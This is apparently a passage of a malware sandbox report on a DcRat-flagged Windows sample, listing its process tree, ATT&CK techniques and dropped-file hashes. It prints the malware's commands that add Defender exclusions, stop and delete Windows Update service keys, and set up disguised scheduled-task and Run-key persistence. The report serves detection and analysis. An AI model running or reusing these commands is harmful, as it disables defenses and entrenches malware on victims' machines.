- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp40FB.tmpmomuxluwyocb.exe"C:\Users\Admin\AppData\Local\Temp\tmp40FB.tmpmomuxluwyocb.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe"C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E86.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 45⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /sc MINUTE /mo 5 /tn "Infrastructure protection v3.39" /tr "'C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"'5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#weslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ufwnctgi2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe nfwhyehyzpwozpzk 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2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1396 -ip 13961⤵
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
2Virtualization/Sandbox Evasion
1Impair Defenses
1Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exeFilesize
7.6MB
MD58e9fe0d0efafefa00a222ddee017327a
SHA1602bf696e8533ff030193435d09ccc0c964871a7
SHA2569b4a1011466da15c2ef7ad0a1f462b7903d3c8158c16b0c67c3e75ef992e979b
SHA512523564c29a8a4c4c5d227039d7f647d9874ed7dd40e08dfcd4628045d3193f3061606a7790c8ff238a403773118e8cae2fa7dfed2271293d8c72082421d127c4
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exeFilesize
7.6MB
MD58e9fe0d0efafefa00a222ddee017327a
SHA1602bf696e8533ff030193435d09ccc0c964871a7
SHA2569b4a1011466da15c2ef7ad0a1f462b7903d3c8158c16b0c67c3e75ef992e979b
SHA512523564c29a8a4c4c5d227039d7f647d9874ed7dd40e08dfcd4628045d3193f3061606a7790c8ff238a403773118e8cae2fa7dfed2271293d8c72082421d127c4
-
C:\ProgramData\AppVirtualBoxHelp\URRERK.exeFilesize
315.1MB
MD58b24a90126213cdb2b3ca983e3885f2a
SHA1c30f53ca388e3dee48a6fdecb1b28f34d61179fb
SHA256575c29654e748301aa94c94f2eda45f793f56acbee943ae1f63eaadbf8cafa01
SHA5125d701625172f3c83da958ce85b19eca557096f23769954afc44ec9e7dceb8e00a61ddbcd0b1b8862b11a10edde133ad26424c0db9ac593504c82834dda07da73
-
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exeFilesize
36KB
MD51830de40a67d611bef5a49baf0b59877
SHA1ba582cfcf2509af03ff6a3d4a1969b33fba39394
SHA25637991ba2aa1e7695429dbf4e0a9e89bf0a008317025de4bc37ce41c190e2cde4
SHA51228151b66a463264aa8f35036397300d30cccb3832fca65398467f851050c9ca865bff0c57a262afa38f38f284058065f5e3f5fab0dd9513f47c00d5fc99b080e
-
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exeFilesize
36KB
MD51830de40a67d611bef5a49baf0b59877
SHA1ba582cfcf2509af03ff6a3d4a1969b33fba39394
SHA25637991ba2aa1e7695429dbf4e0a9e89bf0a008317025de4bc37ce41c190e2cde4
SHA51228151b66a463264aa8f35036397300d30cccb3832fca65398467f851050c9ca865bff0c57a262afa38f38f284058065f5e3f5fab0dd9513f47c00d5fc99b080e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD55f0ddc7f3691c81ee14d17b419ba220d
SHA1f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA5122ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e02e7a1e1d3ba0a704418fea439c95d9
SHA1ac5f68023ab9c0a784996352b322afa29848fed0
SHA2562c9747be93cee1e50fa8f12b315cb6bbc75473a9dbfa1a37783e123065766e89
SHA51256cfb2ad2896baa757c0255f7d3ca886f534837e4fef9a781b9f3f640e11ed07f8ee883283468587c949df62e589ad354f1b397f763cbf0eb3d9e310528fc444
-
C:\Users\Admin\AppData\Local\R2BS7DLRTT9P9T3PNJ7G\IN_Windows 10 Pro (64 Bit)_LLH9Y5UI0CXNDOO9R321\InstalledApp.txtFilesize
2KB
MD50c2ef36ce24dc66d951c942393140fa5
SHA1235ccad4ecaec0a42203e16ec818fb5516648359
SHA25614af2421411997d05144569dedc427d0b38c6299a4600da923a54eb9acdb6cfc
SHA512fb776683ed24233f3a50ca9469bf319f58762dbaf56b3aceeac395cc48b1e58cdc9a86791cefc328eba5b8c31b96e1a7c209e81bce22731b5cce0c8c5894399a
-
C:\Users\Admin\AppData\Local\R2BS7DLRTT9P9T3PNJ7G\IN_Windows 10 Pro (64 Bit)_LLH9Y5UI0CXNDOO9R321\ProcessList.txtFilesize
4KB
MD50a52b564a658ecbafb4dc429f9b7d7dd
SHA1806ea9399dadf54af6e01a4f15598f3a6b9d4c1b
SHA256f84f99969a5e2441cf9a451a9e6045a9d94a2800ed25becb647094fe691ad443
SHA5122c845c25a45ce8443e598a52a70cf48bb3d5454ae70e3000d1b0644018ecf58670792690e83afe1928004b22a0644bb28e6b233fff7d4765cb3cf4c930ee8a84
-
C:\Users\Admin\AppData\Local\Temp\282.exeFilesize
832KB
MD50e955e40dfa3d306c6371e166e62858d
SHA12d58403258335c4d772a40d79c0da6734c06db12
SHA256a9ecbbb1a4de3f9019f7955182af88d2ecfbb6fd38da526b31cb8e7d9b62b517
